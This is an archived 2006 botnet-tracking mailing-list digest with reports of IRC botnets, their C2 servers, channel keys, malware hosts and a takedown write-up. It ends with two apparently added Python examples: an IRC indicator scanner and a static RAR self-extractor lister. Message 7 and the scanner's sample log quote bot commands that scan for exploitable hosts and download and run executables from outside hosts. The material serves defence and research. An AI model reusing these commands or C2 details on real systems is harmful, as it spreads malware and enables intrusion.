To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
>From: [EMAIL PROTECTED]
>Reply-To: [email protected]
>To: [email protected]
>Subject: botnets Digest, Vol 2, Issue 1
>Date: Sun, 02 Apr 2006 04:24:38 -0500
>
>Send botnets mailing list submissions to
>	[email protected]
>
>To subscribe or unsubscribe via the World Wide Web, visit
>	http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
>or, via email, send a message with subject or body 'help' to
>	[EMAIL PROTECTED]
>
>You can reach the person managing the list at
>	[EMAIL PROTECTED]
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of botnets digest..."
>
>
>Today's Topics:
>
>   1. Re: new one (gmailVoldor)
>   2. Re: botnet reporting (Nicholas Albright)
>   3. Botnet/Spam question (Mar Matthias Darin)
>   4. Tiny botnet (Nicholas Albright)
>   5. a write-up on witlog (Kyle Lutze)
>   6. botnet files location report (bart sikkes)
>   7. Re: new one (Niklas Schiffler)
>   8. Re: new one (PinkFreud)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Sun, 26 Mar 2006 13:52:37 +0200
>From: gmailVoldor <[EMAIL PROTECTED]>
>Subject: Re: [botnets] new one
>To: Jeremy Linden <[EMAIL PROTECTED]>
>Cc: [email protected]
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset=ISO-8859-15; format=flowed
>
>
>
> > I just had a conversation with the guy who runs this botnet.  He's from
> > Lebanon, part of the GurLteam (a common name if you do lots of botnet
> > stuff), and he installs spyware on his machines, as a business.  In my
> > opinion, this won't be used for DDoS; these guys are professional
> > criminals who just want to make their money.  I hope they get busted
> > though.
> >
> > Jeremy Linden
>
>
>A professional criminal doesn't use common spyware to infect or IRC to
>control bots; the group makes their own scripts. I think 95% of botnets
>detected are owned by kiddies. Bye
>
>alex
>from italy
>
>
>------------------------------
>
>Message: 2
>Date: Sun, 26 Mar 2006 10:16:59 -0700
>From: Nicholas Albright <[EMAIL PROTECTED]>
>Subject: Re: [botnets] botnet reporting
>To: [email protected]
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset="iso-8859-1"
>
>
> >
> > Naturally, everyone is welcome to start their own systems. If it means
> > anything to anyone, I personally trust the people at Shadowserver.
> >
> > I am not aware of how they report the information, but I am sure they
> > will come up with something.
> >
> > Gadi.
> >
>
>We thank Gadi for his support. Shadowserver supports Whitestar 100% and will
>continue to post to this list.
>
>Sometimes the networks we see can't be posted publicly, as I'm sure everyone
>understands. This mailing list is still the best way to discuss botnets and
>their events publicly. Please continue to do so!
>
>The tracking system reported by Kyle is a one-way mirror: you can post, but you
>can't see other networks until they've been shut down or meet certain
>criteria.
>
>with regards,
>Nicholas
>--
>Nicholas Albright
>Shadowserver.org Founder
>http://www.shadowserver.org
>
>
>
>-------------- next part --------------
>A non-text attachment was scrubbed...
>Name: not available
>Type: application/pgp-signature
>Size: 827 bytes
>Desc: not available
>Url : http://www.whitestar.linuxbox.org/mailman/private/botnets/attachments/20060326/d8ce7314/attachment-0001.pgp
>
>------------------------------
>
>Message: 3
>Date: Sun, 26 Mar 2006 17:47:53 -0600
>From: "Mar Matthias Darin" <[EMAIL PROTECTED]>
>Subject: [botnets] Botnet/Spam question
>To: "BotNet List" <[email protected]>
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset="utf-8"
>
>Hello,
>
>Is there a spamtrap address where spam/virus-infected mail can be sent?
>Note I already direct my server's spam to the FTC and to Blitzed.org.
>
>Thank you in advance.
>
>-------------- next part --------------
>A non-text attachment was scrubbed...
>Name: not available
>Type: application/pgp-signature
>Size: 189 bytes
>Desc: not available
>Url : http://www.whitestar.linuxbox.org/mailman/private/botnets/attachments/20060326/e83412dc/attachment-0001.pgp
>
>------------------------------
>
>Message: 4
>Date: Mon, 27 Mar 2006 14:22:51 -0700
>From: Nicholas Albright <[EMAIL PROTECTED]>
>Subject: [botnets] Tiny botnet
>To: [email protected]
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset="iso-8859-1"
>
>This botnet is interesting to me because the owner knows something about the
>COX ISP's security system. COX has an ircd system in place to catch drones.
>The service they use is called Marvin.
>
>The trojan came to us via a honeypot operating in the NZ area:
>
>Report on cox-securitymarvin.exe -
>********************************************
>MD5: f766e46e42bf32d58ea28062f262249e
>AntiVir: Worm/RBot.328262
>Avast!: Win32:Trojano-3428 [Trj]
>AVG: No Virus Found
>BitDefender: Backdoor.RBot.0E463EAA
>ClamAV: Exploit.DCOM.Gen
>F-Prot: W32 Ircbot1.gen
>
>SERVER: 205.209.156.33
>PORT: 6667
>NICK: Cox-Security-|-123456
>USER CONNECT STRING: USER apbkay 0 0 :Cox-Security-|-123456
>Bot Population: 63
>Channel: ##cox##
>Chan Key: rofl
>Topic: .root.mass -s
>Operator: opwirpwoeipweior
>
>
>The bot was poorly spread: as it doesn't use any packing or obscuring
>techniques, it's quickly picked up by all the virus scanners, and strings
>output will display useful information.
>--
>Nicholas Albright
>Founder of Shadowserver.org
>http://www.shadowserver.org
>
>
>
>-------------- next part --------------
>A non-text attachment was scrubbed...
>Name: not available
>Type: application/pgp-signature
>Size: 827 bytes
>Desc: not available
>Url : http://www.whitestar.linuxbox.org/mailman/private/botnets/attachments/20060327/ee326148/attachment-0001.pgp
>
>------------------------------
>
>Message: 5
>Date: Mon, 27 Mar 2006 12:56:22 -0800
>From: Kyle Lutze <[EMAIL PROTECTED]>
>Subject: [botnets] a write-up on witlog
>To: [email protected]
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset=UTF-8
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>the following was written by a member of shadowserver at nal's request
>and posted by me so he could stay anonymous. anyway, here's some
>information about witlog
>
>Kyle
>
>- ---------------------------------------
>WITLOG - Botnet Report
>"An Old Dog with New Tricks"
>
>Introduction:
>The botnet affectionately known as "WITLOG" to those who monitored,
>tracked and have thus far shut down core parts of its infrastructure
>twice is something of an anomaly in today's botnets.  It doesn't use a
>sophisticated or new worm to propagate.  In fact it uses old code which
>is freely available on the Internet to download and play with.  It also
>didn't use any real form of encryption to hide or obfuscate its actions.
>The operator of the botnet was generally a friendly individual who
>would talk and let you watch what he was up to.  Overall I'd say that
>this wasn't so much an education in sophisticated botnet techniques as
>much as it was an education in just how poorly managed some large
>hosting companies are and that, due to this being a pervasive element of
>the Internet at large, SRS is inherently broken.
>
>Background:
>I first became aware of WITLOG not long after having installed Nepenthes
>to do some malware research.  The WITLOG botnet intrigued me because it
>used a distribution system that, in a perfect world, should have been
>incredibly easy to shut down.  While the worm spread it relied on a
>Round Robin DNS entry to download backdoors and other code via HTTP.
>The backdoor would then rely on another Round Robin DNS entry to connect
>to a small IRC network that ranged between 3 and 5 servers.  The actual
>hosts that the names resolved to resided across the globe.
>
>Tracking & Reporting:
>It was obvious to me from the beginning that the weakest point in the
>WITLOG infrastructure was its reliance on DNS resolution.  So while
>reporting the actual hosts used for HTTP distribution and IRC server
>hosting was part of the equation, it was not the primary focus of my
>efforts.
>
>From the onset I concentrated on hosting companies and hacked servers
>which were being used to serve backdoor (botnet) and adware code to
>infected machines which were located in the United States -- and, after
>quickly determining that witlog.com was used solely for a botnet, getting
>the registrar to remove the domain.
>
>The Infrastructure:
>
>[iPowerWeb - Primary malware hosting servers used by WITLOG during its
>first iteration]
>
>A complete displeasure to work with.  This hosting company boasts a huge
>customer base, offers up pictures of the President of the company posing
>for PR shots with the Mayor of Phoenix, and "Support: 24 hours a day, 7 days
>a week, 365 days a year".  Let me spell this out for you... B U L L S H
>I T.  I have yet to come in contact with a more unresponsive and
>downright abrasive hosting company in my life.  Not only were they
>completely unwilling to put me in contact with anyone in their NOC or
>anyone with any technical experience - but they would close tickets as
>"resolved" when they had made no contact with me whatever.
>
>I suppose it should come as no surprise, considering it was later
>determined that the WITLOG operator had rooted some dozen or so of their
>boxes.  So to any iPowerWeb customers out there - best of luck.
>
>After over a month they did eventually manage to shut the WITLOG
>operator out of their network, according to the WITLOG operator himself.
>
>[OZnic.de - Hacked SRS - First used for WITLOG.com]
>
>This company also proved to be completely unresponsive to requests for
>information, suggestions regarding their situation, and requests for
>contact to discuss the situation.  I have to hypothesize at this point,
>because I don't know what happened internally... But after reporting
>the situation to the BSI and Global Village GmbH, OZnic.de did manage to
>kick the WITLOG operator off of their name servers.
>
>The WITLOG operator had obviously planned for this to happen at some
>point as he already had another SRS lined up in Italy to take over
>duties.  He changed the domain from witlog.com to witlog.net and was
>back in business at full force.
>
>[tuonome.it - Hacked SRS - First used for WITLOG.net]
>
>Also completely unresponsive, but then, what public company wants the
>world to know that their registry key has probably been stolen.
>Eventually, thanks in no small part I'm sure to the efforts of a local
>.IT security expert I found on the Internet, we got the right officials
>in place to apply pressure to tuonome.it.  And that was that.
>
>For now WITLOG appears to be done.  The IRC backend will eventually die
>off given that the WITLOG operator doesn't fire up new code using another
>hacked SRS.  He claims to have several SRSes which are rooted (a few of
>which are in the United States) - but he claims he is saving them for
>something else.
>
>[korea]
>Not much to say here.  I know some have had success in dealing with
>getting hacked servers taken off the network in Korea.  I had no such
>luck.  Completely unresponsive.
>
>The last known operating addresses for HTTP distribution were in Korea
>and are:
>
>Non-authoritative answer:
>Name:    http.down.love.witlog.net
>Address:  222.237.76.96
>Name:    http.down.love.witlog.net
>Address:  222.237.76.91
>
>The IRC servers really don't need to be publicized as the owners of the
>networks have been notified several times over, and it is still pretty
>well populated with hacked machines.
>
>Best of luck to all the other hunters out there.  And thanks to everyone
>involved in applying the pressure needed to bring this one to a close.
>
>Anonymous.
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2.2-ecc0.1.6 (GNU/Linux)
>Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
>iD8DBQFEKFF2VFIipMnXxfYRAq1gAJ9i5Mw2EkMeXXe9TalJcObK+jukjwCfVzuL
>8rPyVWbfr+HoOJw/FlcTgzE=
>=jjpK
>-----END PGP SIGNATURE-----
>
>
>------------------------------
>
>Message: 6
>Date: Tue, 28 Mar 2006 11:38:34 +0200
>From: "bart sikkes" <[EMAIL PROTECTED]>
>Subject: [botnets] botnet files location report
>To: [email protected]
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset=ISO-8859-1
>
>i saw someone posting about this address on a forum saying he noticed
>lots of connections to it in his firewall logs, to me it looks like
>files used by a bot, the cmd2.txt file certainly indicates that. i
>have no further information and am not experienced enough to do
>research on it safely.
>
>http://x90.dyndns.org/
>
>good luck with it,
>bart
>
>
>------------------------------
>
>Message: 7
>Date: Thu, 30 Mar 2006 22:58:38 +0200
>From: Niklas Schiffler <[EMAIL PROTECTED]>
>Subject: Re: [botnets] new one
>To: [email protected]
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
>Jeremy Linden wrote:
>..
> >
> > I just had a conversation with the guy who runs this botnet.  He's from
> > Lebanon, part of the GurLteam (a common name if you do lots of botnet
> > stuff), and he installs spyware on his machines, as a business.  In my
> > opinion, this won't be used for DDoS; these guys are professional
> > criminals who just want to make their money.  I hope they get busted
> > though.
> >
> > Jeremy Linden
>
>Here's another one by the GurLteam:
>
>Botnet (W32/Spybot.AKCH):
>
>[ Network services ]
> * Looks for an Internet connection.
> * Connects to "users.hot-screen.com" on port 6667 (TCP).
> * Connects to IRC server.
> * IRC: Uses password nadjoe.
> * IRC: Uses nickname Tfeh-80340024.
> * IRC: Uses username ezkieyacag.
> * IRC: Joins channel ##Tfeh with password li.
> * IRC: Sets the usermode for user Tfeh-80340024 to -x+B.
>
>
>inetnum:      83.98.133.0 - 83.98.133.255
>netname:      NL-NFORCE-ENTERTAINMENT
>descr:        NForce Entertainment
>country:      NL
>admin-c:      RVE16-RIPE
>tech-c:       RVE16-RIPE
>status:       ASSIGNED PA
>mnt-by:       ROKSCOM-MNT
>source:       RIPE # Filtered
>
>* Looking up users.hot-screen.com
>* Connecting to users.hot-screen.com (83.98.133.125) port 6667...
>* Connected. Now logging in...
>* GurLStuff, [EMAIL PROTECTED]
>* MAP KNOCK SAFELIST HCN MAXCHANNELS=8 MAXBANS=60 NICKLEN=30 TOPICLEN=307
>KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
>* WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+
>CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurLStuff
>CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
>
>--> Now talking on ##Tfeh
>* Topic for ##Tfeh is: ;raw join ##lscan,##lmon
>* Topic for ##Tfeh set by GurL at Sun Mar 26 20:22:26 2006
>
>--> Now talking on ##lscan
>* Topic for ##lscan is: ;advscan dcom135 300 5 0 -r -s
>* Topic for ##lscan set by GurL at Sun Mar 26 20:22:26 2006
>
>--> Now talking on ##lmon
>* Topic for ##lmon is: ;download http://www.darkblueroom.com/smart.exe c:\smart.exe 1 -s
>* Topic for ##lmon set by GurL at Sun Mar 26 20:22:25 2006
>
>smart.exe extracts the following files to c:\Windows\tok (scanned with
>AntiVir)
>
>mc-110-12-0000336.exe (DR/Dldr.NSIS.Agent.P.1)
>smart.exe (?)
>yaz.exe (TR/LowZones.CR.2)
>zan.exe (TR/LowZones.CR.3)
>run.bat
>
>I don't know yet what the unpacked smart.exe does.
>
>nick..
>
>
>
>------------------------------
>
>Message: 8
>Date: Thu, 30 Mar 2006 20:03:42 -0500
>From: PinkFreud <[EMAIL PROTECTED]>
>Subject: Re: [botnets] new one
>To: Niklas Schiffler <[EMAIL PROTECTED]>
>Cc: [email protected]
>Message-ID: <[EMAIL PROTECTED]>
>Content-Type: text/plain; charset=us-ascii
>
> > smart.exe extracts the following files to c:\Windows\tok (scanned
> > with AntiVir)
>
>It should be noted that the smart.exe you grabbed from darkblueroom is
>a RarSFX package.  This can be unpacked with standard 'unrar', for
>those of you not wishing to run it.
>
> > mc-110-12-0000336.exe (DR/Dldr.NSIS.Agent.P.1)
> > smart.exe (?)
> > yaz.exe (TR/LowZones.CR.2)
> > zan.exe (TR/LowZones.CR.3)
> > run.bat
> >
> > I don't know yet what the unpacked smart.exe does.
>
>This one contains the following interesting strings:
>E.C.S. International1'0%
>Secure Application Development1
>E.C.S. International0
>+#o;
>www.ecsinternational.info0>
>HClick here to agree this download...
>(http://dollarrevenue.com/eula.asp?id=1950
>
>I'd say it likely installs spyware on the compromised machine in order
>to make the bot herder money.
>
> >
> > nick..
>
>--
>PinkFreud
>Chief of Security, Nightstar IRC network
>irc.nightstar.net | www.nightstar.net
>Server Administrator - Blargh.CA.US.Nightstar.Net
>Unsolicited advertisements sent to this address are NOT welcome.
>
>
>------------------------------
>
>_______________________________________________
>botnets mailing list
>[email protected]
>http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
>
>
>End of botnets Digest, Vol 2, Issue 1
>*************************************

_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
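The "Tiny botnet" report in Message 4 and the Spybot write-up in Message 7 both hand a defender the same kind of material: a C2 server and port, a nick stem with a random numeric suffix, a fixed ident in the USER line, a channel name and key, and channel topics that carry the bot's orders (`.root.mass`, `;advscan`, `;download`, `;raw join`). The Python below, an added example that is neither the list's nor Shadowserver's code, turns the Message 4 report into indicators and runs them over a few constructed IRC log lines to show what a network-side detector would flag. The report text is quoted from the digest; the log line format (`src dst:port <raw IRC command>`), the sample lines, and every function name are assumptions made for this example. The nick check generalises the page's one nick to the whole "fixed stem plus digits" pattern.

```python
import re
from dataclasses import dataclass

# Report lines quoted from Message 4 of the digest ("Tiny botnet").
TINY_BOTNET_REPORT = """\
SERVER: 205.209.156.33
PORT: 6667
NICK: Cox-Security-|-123456
USER CONNECT STRING: USER apbkay 0 0 :Cox-Security-|-123456
Bot Population: 63
Channel: ##cox##
Chan Key: rofl
Topic: .root.mass -s
Operator: opwirpwoeipweior
"""

# Command prefixes seen in channel topics on the page (Messages 4 and 7);
# RBot/Spybot variants read their orders from the topic on join.
TOPIC_COMMAND_MARKERS = (".root.mass", ";advscan", ";download", ";raw join")


def parse_report(text: str) -> dict:
    """Parse 'Key: value' report lines into a dict keyed by upper-cased key."""
    report = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        report[key.strip().upper()] = value.strip()
    return report


@dataclass
class Indicators:
    server: str
    port: int
    nick_prefix: str      # nick stem with the random numeric suffix removed
    ident: str            # username field of the USER command
    channel: str
    channel_key: str
    topic_markers: tuple = TOPIC_COMMAND_MARKERS


def build_indicators(report: dict) -> Indicators:
    # Bots append a random number to a fixed stem: Cox-Security-|-123456
    nick_prefix = re.sub(r"\d+$", "", report["NICK"])
    # USER <ident> 0 0 :<realname>
    user_parts = report["USER CONNECT STRING"].split()
    ident = user_parts[1] if len(user_parts) > 1 else ""
    return Indicators(
        server=report["SERVER"],
        port=int(report["PORT"]),
        nick_prefix=nick_prefix,
        ident=ident,
        channel=report["CHANNEL"],
        channel_key=report.get("CHAN KEY", ""),
    )


def scan_irc_log(lines, ind: Indicators):
    """Return (line_no, reason) for each log line that matches an indicator.

    Assumed (constructed) line format: '<src_ip> <dst_ip>:<dst_port> <raw IRC command>'.
    """
    hits = []
    nick_re = re.compile(r"^NICK\s+:?" + re.escape(ind.nick_prefix) + r"\d+$")
    for no, line in enumerate(lines, 1):
        try:
            _src, dst, cmd = line.split(" ", 2)
        except ValueError:
            continue                      # not a line we understand
        dst_ip, _, dst_port = dst.rpartition(":")
        if dst_ip == ind.server and dst_port == str(ind.port):
            hits.append((no, f"connection to known C2 {ind.server}:{ind.port}"))
            continue                      # one reason per line is enough
        parts = cmd.split()
        if not parts:
            continue
        verb, args = parts[0], parts[1:]
        if nick_re.match(cmd):
            hits.append((no, f"bot nick pattern {ind.nick_prefix}<digits>"))
        elif verb == "USER" and args and args[0] == ind.ident:
            hits.append((no, f"bot ident {ind.ident}"))
        elif verb == "JOIN" and args and ind.channel in args[0].split(","):
            hits.append((no, f"join to bot channel {ind.channel}"))
        elif verb == "TOPIC" and any(m in cmd for m in ind.topic_markers):
            hits.append((no, "bot command in channel topic"))
    return hits


INDICATORS = build_indicators(parse_report(TINY_BOTNET_REPORT))

# Constructed sample traffic: two bot logins to the reported C2, one benign
# user on another server, then bot-style nick/join/topic on that other server.
SAMPLE_LOG = [
    "10.1.2.3 205.209.156.33:6667 NICK Cox-Security-|-998877",
    "10.1.2.3 205.209.156.33:6667 USER apbkay 0 0 :Cox-Security-|-998877",
    "10.1.2.4 192.0.2.10:6667 NICK alice",
    "10.1.2.4 192.0.2.10:6667 USER alice 0 * :Alice",
    "10.1.2.4 192.0.2.10:6667 JOIN #linux",
    "10.1.2.5 192.0.2.10:6667 NICK Cox-Security-|-555555",
    "10.1.2.5 192.0.2.10:6667 JOIN ##cox## rofl",
    "10.1.2.6 192.0.2.10:6667 TOPIC ##lmon :;download http://example.invalid/x.exe c:\\x.exe 1 -s",
]

if __name__ == "__main__":
    for no, why in scan_irc_log(SAMPLE_LOG, INDICATORS):
        print(f"line {no}: {why}")
```

The server/port match is the cheapest and most reliable signal but dies as soon as the herder moves the ircd; the nick-stem, ident, channel and topic-command checks survive that move, which is why the scanner keeps them separate and reports each reason.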
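PinkFreud's point in Message 8 is that a RAR self-extractor can be inventoried without ever running it. The Python below is an added example (not the list's or any poster's code) of that static triage: it finds the RAR signature embedded after the PE stub and walks the RAR 4.x block headers to list the file names inside. The sample "SFX" is constructed in the script from a dummy MZ stub and a hand-built archive, so the entry names it returns are whatever the constructor put there; the function names and the 64-byte stub are assumptions. Header CRCs are not verified, and RAR5 archives are only located, not walked, because their header layout differs.

```python
import struct

RAR4_MARKER = b"Rar!\x1a\x07\x00"        # RAR 1.5 - 4.x marker block
RAR5_MARKER = b"Rar!\x1a\x07\x01\x00"    # RAR 5.x signature

# RAR 4.x block types used below
_ARCHIVE_HEADER = 0x73
_FILE_HEADER = 0x74
_END_BLOCK = 0x7B


def find_rar_archive(data: bytes):
    """Return (offset, version) of an embedded RAR archive, or None."""
    for marker, version in ((RAR5_MARKER, 5), (RAR4_MARKER, 4)):
        off = data.find(marker)
        if off != -1:
            return off, version
    return None


def list_rar4_entries(data: bytes, start: int) -> list:
    """Walk RAR 4.x block headers from the marker at `start`; return file names."""
    names = []
    pos = start + len(RAR4_MARKER)
    while pos + 7 <= len(data):
        # every block: CRC(2) TYPE(1) FLAGS(2) SIZE(2) [ADD_SIZE(4) if flag 0x8000]
        head_type, flags, head_size = struct.unpack_from("<xxBHH", data, pos)
        if head_size < 7:
            break                                   # corrupt or truncated
        add_size = struct.unpack_from("<I", data, pos + 7)[0] if flags & 0x8000 else 0
        if head_type == _FILE_HEADER:
            name_size = struct.unpack_from("<H", data, pos + 26)[0]
            name_off = pos + (40 if flags & 0x100 else 32)   # 0x100: 64-bit sizes present
            names.append(data[name_off:name_off + name_size].decode("latin-1"))
        elif head_type == _END_BLOCK:
            break
        pos += head_size + add_size                 # skip header and packed data
    return names


def triage(data: bytes) -> dict:
    """Static summary of a suspected SFX: PE stub present? RAR inside? what files?"""
    result = {"is_pe": data[:2] == b"MZ", "rar_offset": None,
              "rar_version": None, "entries": []}
    found = find_rar_archive(data)
    if found:
        result["rar_offset"], result["rar_version"] = found
        if result["rar_version"] == 4:
            result["entries"] = list_rar4_entries(data, result["rar_offset"])
    return result


# ---- constructed sample below: a fake stub plus a hand-built RAR4 archive ----

def _file_header(name: bytes, packed: bytes) -> bytes:
    flags = 0x8000                                  # ADD_SIZE (packed data) follows
    head_size = 32 + len(name)
    body = struct.pack("<BHH", _FILE_HEADER, flags, head_size)
    # PACK_SIZE UNP_SIZE HOST_OS FILE_CRC FTIME UNP_VER METHOD NAME_SIZE ATTR
    body += struct.pack("<IIBIIBBHI", len(packed), len(packed), 0, 0, 0,
                        29, 0x30, len(name), 0x20)
    return struct.pack("<H", 0) + body + name + packed   # CRC left as 0 (unchecked)


def build_sample_sfx() -> bytes:
    stub = b"MZ" + b"\x90" * 62                     # stand-in for the SFX stub (constructed)
    archive = RAR4_MARKER + struct.pack("<HBHHHI", 0, _ARCHIVE_HEADER, 0, 13, 0, 0)
    archive += _file_header(b"run.bat", b"@echo off\r\n")
    archive += _file_header(b"yaz.exe", b"\x00" * 8)
    archive += struct.pack("<HBHH", 0, _END_BLOCK, 0x4000, 7)
    return stub + archive


if __name__ == "__main__":
    print(triage(build_sample_sfx()))
```

On a real sample the same result comes from `unrar l <file>`, as the post says; the point of doing it by hand is to see that the archive is plain RAR data appended to a stub, so a file-type check on the first two bytes alone will call it an executable and miss the payload list.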
